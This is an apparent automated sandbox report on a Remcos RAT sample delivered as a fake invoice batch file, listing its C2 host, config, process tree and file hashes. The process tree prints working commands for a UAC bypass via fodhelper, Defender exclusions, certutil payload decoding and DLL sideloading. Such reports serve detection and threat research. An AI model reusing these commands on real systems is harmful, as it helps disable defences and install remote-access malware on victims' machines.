Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2024, 13:31

General

  • Target

    PROFORMA INVOICE AGAINST PO PO05823-24.bat

  • Size

    3.9MB

  • MD5

    9046e68022d4bf996dde93052d67a9b5

  • SHA1

    502662322e0a225d7dffc841c2a24c5c82582f07

  • SHA256

    ade4c81173fbb4420f1bce21ecfafe78757238840af567dde7a3421059631014

  • SHA512

    e433ba2c480032143de574ff8f5bebaa4adacbf2e8adf79637909260d78da2db63d391a5fff4ade32566eb021ed0a563de8ea797d49b3b8d13f877d45a9f10e7

  • SSDEEP

    49152:OBHEIE8fhpytc5M7ZvRd5A81rmvyuZZGqdZWG4s3pU6C:9

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jaztc.duckdns.org:1808

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    sfsfdrgrre

  • mouse_option

    false

  • mutex

    Rmc-AJ5P19

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\system32\cmd.exe
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3304
      • C:\Windows\system32\extrac32.exe
        extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        3⤵
          PID:5024
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:368
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
          3⤵
            PID:2972
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2176
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            3⤵
              PID:1404
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3824
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4452
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4216
                • C:\Windows\system32\reg.exe
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  5⤵
                  • Modifies registry class
                  • Modifies registry key
                  PID:4520
              • C:\Windows\system32\fodhelper.exe
                "C:\Windows\system32\fodhelper.exe"
                4⤵
                  PID:2468
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat" "C:\\Users\\Public\\Lewxa.txt" 9
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4000
              • C:\Users\Public\kn.exe
                C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat" "C:\\Users\\Public\\Lewxa.txt" 9
                3⤵
                • Executes dropped EXE
                PID:4852
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1832
              • C:\Users\Public\kn.exe
                C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
                3⤵
                • Executes dropped EXE
                PID:656
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c PING -n 3 127.0.0.1
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2328
              • C:\Windows\system32\PING.EXE
                PING -n 3 127.0.0.1
                3⤵
                • Runs ping.exe
                PID:3992
            • C:\Users\Public\Libraries\Lewxa.com
              C:\\Users\\Public\\Libraries\\Lewxa.com
              2⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2616
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c mkdir "\\?\C:\Windows "
                3⤵
                  PID:4668
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c mkdir "\\?\C:\Windows \System32"
                  3⤵
                    PID:5052
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "C:\Windows \System32\2763688.exe"
                    3⤵
                      PID:3788
                      • C:\Windows \System32\2763688.exe
                        "C:\Windows \System32\2763688.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3068
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                          5⤵
                            PID:4752
                            • C:\Windows\system32\cmd.exe
                              cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                              6⤵
                                PID:1400
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                  7⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1808
                        • C:\Windows\SysWOW64\extrac32.exe
                          C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Obakqeqc.PIF
                          3⤵
                            PID:3768
                          • C:\Windows\SysWOW64\colorcpl.exe
                            C:\Windows\System32\colorcpl.exe
                            3⤵
                              PID:4456
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:1256
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:4000
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:1008
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                            2⤵
                            • Executes dropped EXE
                            PID:4236
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4532
                            • C:\Windows\system32\taskkill.exe
                              taskkill /F /IM SystemSettings.exe
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2292
                          • C:\Users\Public\alpha.exe
                            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4124
                            • C:\Windows\system32\taskkill.exe
                              taskkill /F /IM SystemSettingsAdminFlows.exe
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3188
                          • C:\Windows\system32\cmd.exe
                            cmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S
                            2⤵
                              PID:1360
                          • C:\Windows\system32\SystemSettingsAdminFlows.exe
                            "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                            1⤵
                              PID:488
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2144 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
                              1⤵
                                PID:1744

                              Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\sfsfdrgrre\logs.dat

                                      Filesize

                                      144B

                                      MD5

                                      e145530262821f524b68633df6707104

                                      SHA1

                                      7558c9f7a0271e4ec3200ca0ce2f0bd2f6936ab7

                                      SHA256

                                      cf22f4ed8a9e925ea6cfc0e48d4a3435d87136ea9606752799a830272722410c

                                      SHA512

                                      f6b0827fd02a75259a6f799d96779f3d0b22853a65a86af0eb9648c4e4d6f76a3d51e1cb11d95d0300ce0b3c31384505245ab798128bac149a25579e80015332

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      64B

                                      MD5

                                      5caad758326454b5788ec35315c4c304

                                      SHA1

                                      3aef8dba8042662a7fcf97e51047dc636b4d4724

                                      SHA256

                                      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                      SHA512

                                      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3infxdf.nuk.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Public\Lewxa.txt

                                      Filesize

                                      2.8MB

                                      MD5

                                      975e25a8051c1d0de162a23c260c5b5d

                                      SHA1

                                      810a893f73c93943b68efc754a741cac53cbe4ed

                                      SHA256

                                      aa831ac7d5d124de04f4c8ba044c1e9992aa8444e76211bfa48b732b72dd3e30

                                      SHA512

                                      9b228f6979599f9113aaac99700cef239636ca3082d1408e05795fdb3d6b31b87dfcac3ad40b8e29b0212ac2ca50456b85585694770b72e747d46450c22dae39

                                    • C:\Users\Public\Libraries\Lewxa.com

                                      Filesize

                                      1.4MB

                                      MD5

                                      4137d0c618df7e27ec028b736dd445f8

                                      SHA1

                                      bd25560c671122df766b31923cc092ff9857a40e

                                      SHA256

                                      de0a3a5c52c2d14d7b958cc74fd42453bb34495708d1f75374a2e496a11b0c9d

                                      SHA512

                                      fc28e8430f2858b38942688d209f66a362b249c8aa0c2eac2623839e30615d1de6263b39b728f22e3c9611404b405ab91d799434c2f314d63d71cf3edf4ab92f

                                    • C:\Users\Public\alpha.exe

                                      Filesize

                                      283KB

                                      MD5

                                      8a2122e8162dbef04694b9c3e0b6cdee

                                      SHA1

                                      f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                      SHA256

                                      b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                      SHA512

                                      99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                    • C:\Users\Public\kn.exe

                                      Filesize

                                      1.6MB

                                      MD5

                                      bd8d9943a9b1def98eb83e0fa48796c2

                                      SHA1

                                      70e89852f023ab7cde0173eda1208dbb580f1e4f

                                      SHA256

                                      8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                                      SHA512

                                      95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

                                    • C:\Users\Public\kn.exe

                                      Filesize

                                      65KB

                                      MD5

                                      0a45d00b61fac2a9ba93e09a9537ef0e

                                      SHA1

                                      4f8860d0dcbb1ca53c6f205263a08286ad9a456c

                                      SHA256

                                      1016e0c660ea73cf168713c47c00919ab14201d77ea3c4fd4ec80e46d14bc29e

                                      SHA512

                                      aecf07328d16ce81fc3c2e51f4bfa01540c09c7e8d4f4e1af66035e17b36e74f0332f63de2d5dd474c03767b496a023eebc5cf2db2f4fc21e78e36a2f3143782

                                    • C:\Users\Public\kn.exe

                                      Filesize

                                      128KB

                                      MD5

                                      008b00f7f7693750d748ce5d8ca5d9bb

                                      SHA1

                                      3a5527409229b5235e35440e902d32023fc41dc5

                                      SHA256

                                      f07408246e3e8198d77d0c45e7134a0a61e188984624f63f041e6a777f047534

                                      SHA512

                                      f40d9941dfe1b5eb598e3a8633983abf882239a2c8902519d1dffc00c8a877ede0cd37d974cada77efb3042f814c69b15c436d8ad3c96f2e348c837fd4d9b02b

                                    • C:\Users\Public\xkn.exe

                                      Filesize

                                      442KB

                                      MD5

                                      04029e121a0cfa5991749937dd22a1d9

                                      SHA1

                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                      SHA256

                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                      SHA512

                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                    • C:\Windows \System32\2763688.exe

                                      Filesize

                                      128KB

                                      MD5

                                      231ce1e1d7d98b44371ffff407d68b59

                                      SHA1

                                      25510d0f6353dbf0c9f72fc880de7585e34b28ff

                                      SHA256

                                      30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                                      SHA512

                                      520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

                                    • C:\Windows \System32\netutils.dll

                                      Filesize

                                      112KB

                                      MD5

                                      fa7aa88417d0c48807144a1a48fe3fbc

                                      SHA1

                                      6f5ec990b12d4a6075050a94e0d68d03781fa46d

                                      SHA256

                                      2019dcd18ba7d5554a4a9da882740aa883941670af3de9396960081a0f8aa098

                                      SHA512

                                      99b2eb6f8e7d00a3803cba229149e5e0cb67a3deb607782c55fbacd25d9c074cce83759de15490eff939d5ad98f26cdbd44395cc79ffe22753e16c3d9e3b5fff

                                    • C:\windows \system32\KDECO.bat

                                      Filesize

                                      11KB

                                      MD5

                                      c545650595b479c81ad6b9d8882aae39

                                      SHA1

                                      7a98aa2e6eee23b3c1bba876955d525bc618b3f0

                                      SHA256

                                      a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9

                                      SHA512

                                      85ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3

                                    • memory/1808-85-0x00007FFB2E090000-0x00007FFB2EB51000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/1808-86-0x000002577DA00000-0x000002577DA10000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1808-91-0x00007FFB2E090000-0x00007FFB2EB51000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/1808-88-0x000002577DA00000-0x000002577DA10000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1808-87-0x000002577DA00000-0x000002577DA10000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/2616-57-0x0000000002D50000-0x0000000003D50000-memory.dmp

                                      Filesize

                                      16.0MB

                                    • memory/2616-58-0x0000000002D50000-0x0000000003D50000-memory.dmp

                                      Filesize

                                      16.0MB

                                    • memory/2616-61-0x0000000000400000-0x0000000000572000-memory.dmp

                                      Filesize

                                      1.4MB

                                    • memory/2616-52-0x0000000000780000-0x0000000000781000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/2616-92-0x0000000000780000-0x0000000000781000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3068-72-0x00000000613C0000-0x00000000613E3000-memory.dmp

                                      Filesize

                                      140KB

                                    • memory/4452-35-0x00007FFB30700000-0x00007FFB311C1000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/4452-27-0x00007FFB30700000-0x00007FFB311C1000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/4452-28-0x0000019D2A6A0000-0x0000019D2A6B0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4452-29-0x0000019D2A6A0000-0x0000019D2A6B0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4452-32-0x0000019D2A6A0000-0x0000019D2A6B0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/4452-17-0x0000019D12520000-0x0000019D12542000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/4456-100-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-111-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-103-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-105-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-99-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-106-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-107-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-108-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-109-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-104-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-116-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-98-0x0000000004390000-0x0000000005390000-memory.dmp

                                      Filesize

                                      16.0MB

                                    • memory/4456-118-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-119-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-126-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-127-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB

                                    • memory/4456-134-0x0000000000400000-0x0000000000482000-memory.dmp

                                      Filesize

                                      520KB